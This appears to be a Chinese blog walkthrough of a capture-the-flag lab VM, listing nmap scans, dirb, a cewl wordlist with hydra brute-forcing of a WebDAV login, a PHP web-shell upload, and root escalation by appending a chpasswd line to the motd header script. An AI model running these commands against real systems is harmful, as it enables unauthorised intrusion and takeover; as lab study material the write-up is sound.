nmap
1:查看存活主机ip: nmap -sP 192.168.1.0/24
192.168.1.134 就是刚打开的虚拟机
2:开放端口: nmap -sS 192.168.1.134
- nmap -sS 192.168.1.134 //检查开启端口信息
- nmap -sT 192.168.1.134 //检查开启端口信息
- nmap -sTU 192.168.1.134 -p 22,8928,8906,8907 -Pn //检查指定tcp/udp开启端口信息//-Pn 防ping
22是开着ssh服务,80可以尝试访问web页面
主页除了这段文字就几张图片
dirbuster/dirb
3.扫描目录:
试了这个好像不行或者没用好:dirbuster -u http://192.168.1.134
然而用:dirb http://192.168.1.134
dirb就找到了这个登录页。打开看看需要密码
cewl
4:用cewl提取主页文字生成字典,再用kali工具hydra对其进行爆破
- cewl -d 2 -m 2 -w docswords.txt http://192.168.1.134
- hydra -L docswords.txt -P docswords.txt http://192.168.1.134 http-get /webdav
hydra
5:用hydra爆破的用户密码登录刚才找到的登录页
- 除了一颗返回上一页按钮,没东西了
- Apache/2.4.29 (Ubuntu) Server at 192.168.1.134 Port 80
百度了一下:webdav说这里是可以读写的!
用cadaver登录webdav,看来应该可以直接上传shell。
shell
后来找了个php的shell,用nc发到虚拟机的.,,上传后去浏览器就可以访问了/
6:但当前用户是www-data,只是普通权限。随便翻翻逛逛–:
home目录下的三个用户,可能是为ssh登陆的用户名;
在inferno用户目录下找到一个user.txt显示Flag: {5f95bf06ce19af69bfa5e53f797ce6e2}
在根目录的mnt目录下找到了hell.sh
关于hell.sh:brainfuck在线解码的网站:,各种解码网站
7:解码后得到的chitragupt,就是上一步home目录下inferno用户的ssh登录密码…(百度来的)
所以可以用inferno用户直接登录ssh
然而这并没有root权限:Permission denied
su - root
8:提权(通过修改ssh登陆时的欢迎信息对root密码进行修改)
修改/etc/update- motd.d/00-header
echo "echo 'root:admin' | sudo chpasswd" >> 00-header要退出一下再重新登陆才可以。
cmd窗口看不清root.txt界面
- 本文链接:https://woosec.com/2020/11/30/defnote/
- 版权声明:本博客所有文章除特别声明外,均默认采用 许可协议。